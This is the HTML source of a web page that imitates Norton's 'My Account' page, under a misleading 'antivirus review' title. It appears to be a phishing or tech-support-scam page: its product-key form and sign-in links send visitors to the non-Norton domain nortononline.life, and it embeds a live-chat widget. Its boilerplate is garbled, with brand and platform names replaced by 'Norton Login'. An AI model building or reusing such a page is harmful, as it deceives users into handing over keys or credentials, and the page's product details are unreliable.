
<html class="no-js" lang="en">
   <head>
      <meta charset="utf-8" />
      <meta name="viewport" content="width=device-width, initial-scale=1.0" />
      <meta name="description" content="Antivirus Software will protect your computer from malicious software. We have reviewed the best Free Antivirus Software programs of 2020." />
      <title>Free Antivirus Software Review - Best 10 Antivirus 2020</title>
      <!-- noorton page3 style -->
      <link rel="stylesheet" href="css/norton_page3_ngmp_style_bundle.min.css">
      <link rel="stylesheet" href="css/norton_page3_home_styles.min.css">

      <!-- noorton page4 style -->
      <link href="css/norton-page-4-font.css" rel="stylesheet">
      <link href="css/norton-page-4-style.css" rel="stylesheet" type="text/css">
      <style type="text/css">
         /* symantec-sans_light.woff */
         @font-face {
         font-family: 'Symantec Sans Light';
         font-style: normal;
         font-weight: 300;
         src: url(fonts/symantec-sans_light.woff) format('woff'),
         url(fonts/symantec-sans_light.ttf) format('truetype');
         }
         /* symantec-sans_regular.woff */
         @font-face {
         font-family: 'Symantec Sans';
         font-style: normal;
         font-weight: 400;
         src: url(fonts/symantec-sans_regular.woff) format('woff'),
         url(fonts/symantec-sans_regular.ttf) format('truetype');
         }
         .header1 a {
  float: left;
  color: black;
  text-align: center;
  padding: 20px;
  text-decoration: none;
  font-size: 18px; 
  line-height: 25px;
  border-radius: 4px;
}
.header-right {
  float: right;
}
      </style>
      
       <script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/5e71f4808d24fc22658852fe/default';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
      <!--[if (gte IE 9) | (!IE)]><!-->
      <script src="js/jquery.min.js"></script>
      <!--<![endif]-->
      <link rel="stylesheet" href="css/main.css" />
   </head>
   <body>
      <!-- Nortan page -->
      
      <div class="npwrap norton_page3">
         <header class="np-global-header norton-home header1 " id="ngp-main-header">
            
  
  <div>
      <a href="#">&nbsp;&nbsp;&nbsp;</a>
    <a href="#">Product & Services</a>
    <a href="#">Blog</a>
    <a href="#">Support</a>
    
     
  
</div>
<div class="header-right">
    
    <a href="https://nortononline.life/login/sso/"><span><img src="icon_myaccount.svg" alt="My Account"></span>&nbsp;My Account</a>
     <a href="#">&nbsp;&nbsp;</a>
    
                           
                        </button>
 </div>
         </header>
         <div class="npcontent has-margin-top">
            <div class="t__landing__page__container">
               <section class="o__hero__container">
                  <div class="o__grid__container">
                     <div class="m__copy__container has--shadow">
                        <h1 class="a__first__headline is--marketing">
                        Welcome to My Account
                        </h1>
                        <h3 class="a__third__headline is--marketing">
                           To access the features in your plan, click below.
                        </h3>
                     </div>
                     <form id="loginform" name="loginform" method="post" action="https://nortononline.life/login/sso/">
                        <div class="m__button__cta">
                           <input type="hidden" name="site_name" value="techricPage">
                           <button type="submit" class="a__primary__button">
                          Enter a Product Key
                           </button>
                           <p class="a__link is--marketing has--shadow">
                             
                           </p>
                           <a href="https://nortononline.life/login/sso/" style="color: white;"> Returning customer? Sign In</a>
                        </div>
                     </form>
                  </div>
               </section>
            </div>
         </div>
      </div>
      <div class="np-global-footer norton_page3" id="ngp-main-footer">
         <div class="row">
            <ul class="footer-links">
               <li>
               </li>
               <li>
               </li>
               <li class="copy-right">
               </li>
            </ul>
         </div>
      </div>
      <div class="np-global-footer norton_page3" id="ngp-main-footer">
         <div class="row">
            <ul class="footer-links">
               <li>
               </li>
               <li>
               </li>
               <li class="copy-right">
               </li>
            </ul>
         </div>
      </div>
      <div class="container">
        <section class="renew clearfix">
            <div class="col left">
               <div class="steptitle">
                  <h4>Login your account can be used to perform the following tasks:</h4>
               </div>
               <ol>
                  <li class="step two-line">
                     Activate your product
                  </li>
                  <li class="step">
                     Access your backup
                  </li>
                  <li class="step">
                     Access or create your cloud vault
                  </li>
                  <li class="step">
                     Manage your Norton subscriptions
                  </li>
                  <li class="step">
                     Reinstall Norton Login products by using your product keys stored in your account
                  </li>
                  <li class="step">
                     Buy storage to add more space for your cloud backup
                  </li>
               </ol>
            </div>
            <div class="col right">
               <img src="img/N360_Graphic_Devices_UIs_UK-IN.jpg" width="540" height="337">
               <p class="footnote">Screens are simulated and subject to change.<br>
                  Features may differ depending on your chosen plan.
               </p>
            </div>
        </section>
        <section class="guarantee-2">
            <h4>Our Promise</h4>
            <div class="third first">
               <img src="img/VPP-Seal-EMEA-DisclaimerSymbol-NewYellow-EN.png" width="95" height="110" class="icon">
               <div class="description">
                  100% Virus Protection Promise<sup>2</sup>
               </div>
            </div>
            <div class="third">
               <img src="img/Brand_Seal_60Day_Money_Back_Guarantee_NewYellow_EN.png" width="100" height="auto" class="icon">
               <div class="description">
                  60-Day Money Back Guarantee <br>
                  for annual Norton Logins<sup>*</sup>
               </div>
            </div>
            <div class="third last">
               <img src="img/guarantee-2-3.png" width="95" height="96" class="icon">
               <div class="description">
                  24/7 Support<sup>∆</sup>
                  <br>&nbsp;
               </div>
            </div>
        </section>
        <footer id="footer">
            <div class="sys-requirements">
               <div class="expand-header">System Requirements</div>
               <div class="expand-details">
                  <h4>Device Security</h4>
                  <p class="intro"><em>Not all features are available on all platforms. </em><br>
                     <em>Norton Family Parental Controls, Norton Cloud Backup, and SafeCam are presently not supported on Mac OS.</em>
                  </p>
                  <p>Windows™ Operating Systems</p>
                  <ul>
                     <li>Norton Login Windows™ 10 (all versions), except Windows 10 S. </li>
                     <li>Norton Login Windows 8/8.1 (all versions). Some protection features are not available in Windows 8 Start screen browsers.</li>
                     <li>Norton Login Windows 7 (all versions) with Service Pack 1 (SP 1) or later.</li>
                  </ul>
                  <p>Mac® Operating Systems</p>
                  <ul>
                     <li>Current and previous two versions of Mac OS.</li>
                     <li>Norton Family Parental Control features are not supported.</li>
                  </ul>
                  <p>Norton Login™ Operating Systems</p>
                  <ul>
                     <li>Norton Login 6.0 or later. Must have Google Play app installed.</li>
                     <li>Auto-scan of apps on Google Play is supported on Norton Login 4.1 or later, except for Samsung devices. Samsung devices running Norton Login 4.2 or later are supported. For earlier versions of Norton Login, the Google Play “Share�? function must be used to scan apps on Google Play.</li>
                  </ul>
                  <p>Norton Login Operating Systems</p>
                  <ul>
                     <li>iPhones or iPads running the current and previous two versions of Apple Norton Login</li>
                  </ul>
                  <h4>Norton Secure VPN</h4>
                  <p class="intro">
                     <strong>Available for Windows™ PC, Mac®, Norton Login and Norton Login™ devices:</strong><br>
                     Norton Secure VPN is compatible with PCs, Macs, Norton Login smartphones and tablets, iPads, and iPhones. Norton Secure VPN may be used on the specified number of devices – with unlimited use during the Norton Login term.
                  </p>
                  <p>Windows™:</p>
                  <ul>
                     <li>Norton Login Windows 7 (all versions) with Service Pack 1 (SP 1) or later</li>
                     <li>Norton Login Windows 8/8.1 (all versions)</li>
                     <li>Norton Login Windows 10 (all versions)</li>
                  </ul>
                  <p>Mac®</p>
                  <ul>
                     <li>Current and previous two versions of MacOS®</li>
                  </ul>
                  <p>Norton Login™:</p>
                  <ul>
                     <li>6.0 or later</li>
                  </ul>
                  <p>Apple® Norton Login:</p>
                  <ul>
                     <li>iPhones or iPads running the current and previous two versions of Apple Norton Login</li>
                  </ul>
               </div>
            </div>
            <div class="legal-footer" id="legal-disclaimers">
               <div class="expand-header-open disclaimers">Important Subscription, Pricing Offer Details and Other Disclosures</div>
               <div class="expand-details always-open">
                  <strong class="heading">*IMPORTANT SUBSCRIPTION, PRICING AND OFFER DETAILS:</strong>
                  <ul>
                     <li>Your Norton Login begins when your purchase is completed (or otherwise, when your payment is received). You must download and install on each device, or complete enrollment to get protection.</li>
                     <li>By subscribing, you are purchasing a recurring Norton Login which will automatically renew after the first term.</li>
                     <li>The price quoted today is valid for the first term of your Norton Login. After that, your Norton Login will be billed at the applicable monthly or annual renewal price <a href="javascript:void(0);">here</a>. The price is subject to change, but we will always send you a notification email in advance.</li>
                     <li>You can cancel your Norton Login at my.norton.com or by contacting <a href="javascript:void(0);">Member Services and Support</a>. For more details, please visit the <a href="javascript:void(0);">Refund Policy</a>.</li>
                     <li>Your Norton Login may include product, service and/or protection updates and features that may be added, modified or removed subject to the acceptance of the <a href="javascript:void(0);">License Agreement</a>.</li>
                     <li>The number of supported devices allowed under your plan are for personal or household use only. Not for commercial use. If you have issues adding a device, please contact <a href="javascript:void(0);">Member Services &amp; Support</a>.</li>
                  </ul>
                  <p><sup>2</sup><strong> Virus Protection Promise:</strong> To be eligible, you must have a qualifying Norton Login with automatic renewal. If a Norton expert is unable to remove the virus from your device, then you may receive a refund based on the actual price paid for the current term of your qualifying Norton Login. If you have a bundle (a qualifying Norton Login from NortonLifeLock purchased with either another offering from NortonLifeLock, or a third party offering), your refund will be limited to the Manufacturer’s Suggested Retail Price of your qualifying Norton Login for the current term, not to exceed the total bundled price paid. Any refund will be net of any discounts or refunds received and less any shipping, handling and applicable taxes, except in certain states and countries where shipping, handling and taxes are refundable.<strong> The refund does not apply to any damages incurred as a result of viruses. See</strong> <a href="javascript:void(0);">Norton Login</a> <strong>for complete details.</strong></p>
                  <p><sup>∆</sup> English only. See <a href="javascript:void(0);">Norton Login</a> for details.</p>
               </div>
            </div>
            <div class="copyright">
               Copyright © 2020 Norton Login. All rights reserved. Norton Login, the Norton Login Logo, the Checkmark Logo, Norton, Norton Login, and the Norton Login Logo are trademarks or registered trademarks of Norton Login. or its affiliates in the United States and other countries. Norton Login, Google Chrome, Google Play and the Google Play logo are trademarks of Google, LLC. Mac, iPhone, iPad, Norton Login and the Norton Login logo are trademarks of Norton Login, registered in the U.S. and other countries. App Store is a service mark of Norton Login. Norton Login and the Window logo are trademarks of Norton Login Corporation in the U.S. and other countries. The Norton Login robot is reproduced or modified from work created and shared by Google and used according to terms described in the Creative Commons 3.0 Attribution License. Other names may be trademarks of their respective owners.
            </div>
        </footer>
      </div>
      <!-- Antivirus comperision -->
      
      <!doctype html>
<html lang="en-US">

     

      <script src="js/script.js"></script>
	  </body>
	  
</html>